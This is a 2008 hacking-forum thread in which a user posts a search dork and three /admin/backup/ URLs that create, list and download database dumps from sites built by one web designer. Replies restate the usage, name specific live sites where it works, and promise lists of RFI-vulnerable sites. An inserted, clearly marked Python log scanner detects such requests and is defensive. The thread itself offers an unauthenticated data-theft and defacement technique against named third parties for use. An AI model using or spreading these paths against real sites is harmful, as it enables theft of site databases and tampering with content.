paxnWo Posted October 25, 2008

######################
# Discovered by: paxnwo
# Mail: paxnwo@yahoo.com
# 26.oct.2008
######################
(x)------------------------------------------------------------------------------------(x)
~| D0rk: design and developed by Parlic Design
~| Exploit1: /admin/backup/backup.php <!-- creates a backup of the db and provides you its name. eg : 26-10-2008 01-35.sql -->
~| Exploit2: /admin/backup/dump/db-backup-name.sql
~| Usage: www.site.com/admin/backup/dump/26-10-2008 01-35.sql
~| Exploit3: /admin/backup/list.php <!-- lists the available backups. you are now logged in as admin; you can change the content -->
(x)------------------------------------------------------------------------------------(x)

It's no big deal. I could have posted all the sites created by Parlic Design in show-off, and "oh, what a great hacker I am". So that you can study the contents of /admin/, I found a site, also by Parlic Design, that is not protected: Index of /admin. Besides the fact that you can get your hands on their database, on some of them you can also modify the content. Play around and it will work.
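Added example, not part of the original thread: a defender-side check that scans a web server access log for successful, unauthenticated requests to the three backup paths listed in the post above. The log lines are constructed, and both the Combined Log Format and the use of the remote-user field as the authentication signal are assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Paths as listed in the post; the site may live in a subdirectory, so only
# the tail of the path is anchored.
RULES = [
    ("create", re.compile(r"/admin/backup/backup\.php$")),
    ("list", re.compile(r"/admin/backup/list\.php$")),
    ("dump", re.compile(r"/admin/backup/dump/[^/]+\.sql$", re.I)),
]
# Assumed log layout: host ident user [time] "METHOD path PROTO" status bytes
LINE = re.compile(r'^(\S+) \S+ (\S+) \[[^\]]+\] "(\S+) (\S+) HTTP/[\d.]+" (\d{3}) (\S+)')

# Constructed sample log lines (documentation-range addresses).
SAMPLE = [
    '203.0.113.7 - - [26/Oct/2008:01:35:02 +0200] "GET /admin/backup/backup.php HTTP/1.1" 200 512',
    '203.0.113.7 - - [26/Oct/2008:01:35:09 +0200] "GET /admin/backup/dump/26-10-2008%2001-35.sql HTTP/1.1" 200 184220',
    '198.51.100.4 - - [26/Oct/2008:02:00:00 +0200] "GET /admin/backup/list.php HTTP/1.1" 401 401',
    '198.51.100.9 - editor [26/Oct/2008:02:10:00 +0200] "GET /admin/backup/list.php HTTP/1.1" 200 900',
    '192.0.2.15 - - [26/Oct/2008:02:11:00 +0200] "GET /index.php HTTP/1.1" 200 3000',
]

def find_backup_exposure(lines):
    """Map client address -> [(kind, path, bytes)] for unauthenticated 200s."""
    hits = defaultdict(list)
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue  # not in the assumed format
        ip, user, _method, raw_path, status, size = m.groups()
        # Assumption: "-" in the remote-user field means no HTTP authentication.
        if status != "200" or user != "-":
            continue
        # Drop the query string, then decode %20 etc. (dump names contain a space).
        path = unquote(raw_path.split("?", 1)[0])
        for kind, rx in RULES:
            if rx.search(path):
                hits[ip].append((kind, path, 0 if size == "-" else int(size)))
                break
    return dict(hits)

if __name__ == "__main__":
    for ip, events in find_backup_exposure(SAMPLE).items():
        for kind, path, size in events:
            print(f"{ip}\t{kind}\t{size}\t{path}")
```

Any hit means the backup scripts or the dump directory answered without authentication; the fix is on the server side (require authentication for /admin/ and keep dumps outside the web root).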

xZu Posted October 25, 2008

Heh, I found the same thing too... I'm not sure whether it was before you... anyway, it doesn't matter: http://rstcenter.com/forum/12558-scvladimirci-org.rst
edit: good work

paxnWo Posted October 26, 2008 (Author)

I've also added exploit3 ... these people pay good money, I think, to have a site ... but one that is buggy.

nsilviu Posted November 25, 2008

Please tell me too how you use the code above. Where do you put it, on localhost or somewhere else, and what do you do with it? Please.

a13x4nd7u Posted November 25, 2008

If you find a site by Parlic Design you can use paxnWo's exploits.
Usage exploit1: www.site.com/admin/backup/backup.php
Usage exploit2: www.site.com/admin/backup/dump/26-10-2008 01-35.sql
Usage exploit3: www.site.com/admin/backup/list.php
Well done paxnWo!

nsilviu Posted November 25, 2008

Thank you very much. That is how I had tried it too, but it doesn't work on all sites and I thought I was doing it wrong. Thanks also to a13x4nd7u for explaining....
Worth mentioning: it works, but not on all of them, e.g. http://www.buldog-klub.si, but it does work on others, e.g. http://www.liderdirektor.com/
Well done paxnWo, if you have more, post more.

paxnWo Posted November 25, 2008 (Author)

Thanks. I'm going to start posting sites vulnerable to RFI. I give you the list, you play around.

Vlachs Posted November 26, 2008 (edited)

Well done pax, I see you're starting to get involved.
edited: <title>Untitled Document</title> these are supposedly PHP pages :))
Edited November 26, 2008 by Vlachs